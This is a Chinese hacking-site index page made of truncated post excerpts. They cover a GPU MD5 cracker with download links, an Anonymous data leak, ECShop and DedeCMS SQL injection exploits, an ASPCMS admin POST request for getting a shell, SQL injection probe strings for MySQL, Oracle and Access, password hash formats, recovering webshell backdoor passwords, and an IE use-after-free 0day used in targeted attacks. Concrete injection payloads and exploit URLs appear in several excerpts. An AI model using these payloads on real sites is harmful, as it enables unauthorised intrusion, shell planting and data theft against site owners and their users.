GPU破解MD5 hash工具
刚发现的这个小工具 BarsWF 之前也常听朋友说起GPU破解很牛x 速度可以达到 1800M hashes/s 工具有三个版本 分别对应 AMD Brook Beta 0.9 - 对应 ATi/AMD cards 2x, 8.12 http://3.14.by/files/BarsWF_Brook_x32.zip http://3.14.by/files/BarsWF_Brook_x...
刚发现的这个小工具 BarsWF 之前也常听朋友说起GPU破解很牛x 速度可以达到 1800M hashes/s 工具有三个版本 分别对应 AMD Brook Beta 0.9 - 对应 ATi/AMD cards 2x, 8.12 http://3.14.by/files/BarsWF_Brook_x32.zip http://3.14.by/files/BarsWF_Brook_x...
据外媒报道,国外黑客组织“匿名者”于近日在网上发布了来自于美国银行、汤森路透、 ClearForest、彭博社、TEKSystems的内部数据,而数据的总量达到了14GB。据悉,“匿名者”在一个名为Par-AnoIA的网站上公布了这一消息,并在网页中提供了数据的查看链接以及数据的简要说明。 “匿名者”指出,他们发布的这14GB数据主要涉及了包括美国银行在内的多家公司里雇员及高管的个人信息,...
漏洞作者:360 漏洞分析:Seay 博客:www.cnseay.com 今天习惯性的到处逛,看看文章。看到了360爆的一个ecshop 支付宝支付插件的注入漏洞,照例的分析下,360的团队还是挺赞的。 由于漏洞源于ecshop的支付宝支付插件,所有利用前提是站点安装此插件,利用不受GPC影响。 漏洞核心代码在includesmodulespaymenta...
老的ASPCMS版本的秒杀拿SHELL漏洞 找到后台。。。然后 /admin/_system/AspCms_SiteSetting.asp?action=saves 直接POST runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&S...
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。 如何注入就不多说了,自己捉摸! https://www.webshell.cc/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html https://www.webshell.cc/comment-8967'/**/and/**/Ex...
题外话:最近对加密的方式讨论挺火的 --------------*nix系------------------------ 系统:ES(Unix) 例子: IvS7aeT4NzQPM 说明:Linux或者其他linux内核系统中 长度: 13 个字符 描述:第1、2位为salt,例子中的'Iv'位salt,后面的为hash值 系统:MD5(Unix) 例子:$1$12345678$XM4P3PrK...
假设这么一个注射点: show.html?id=2 mysql:id=2 and version()>0 oracle:id=2 and '1'||'1'='11 其他的欢迎补充 1# upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47 Access: aNd aSc(cHr(97))=97 and exists(sele...
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。 既然已经发出来了,我就把我自己搞的exp发下吧。。唉。 我一般是这样测试的: 提交 http://webshell.cc/plus/search.php?keyword=as&typeArr[ uNion ]=a ...
下面简单的揭露下怎么获取webshell后门密码 1. 在password登陆框 随便输入一错误密码,提示error,如图: 2. 然后右键查看源文件,搜索[password],font 后面跟的就是shell的密码,测试一下 3. 按照上面的方法,貌似通杀…
new IE 0day coming-mshtml!CDwnBindInfo object use after free vulnerability - 一个影响IE8及以上版本的0day被国外某网站所披露,它通过挂马方式,针对CFR(Council on Foreign Relations)网站的用户进行定向攻击。 我们在@eromang及@yomuds的帮助下,并对其进行简单分析。我们发现其本...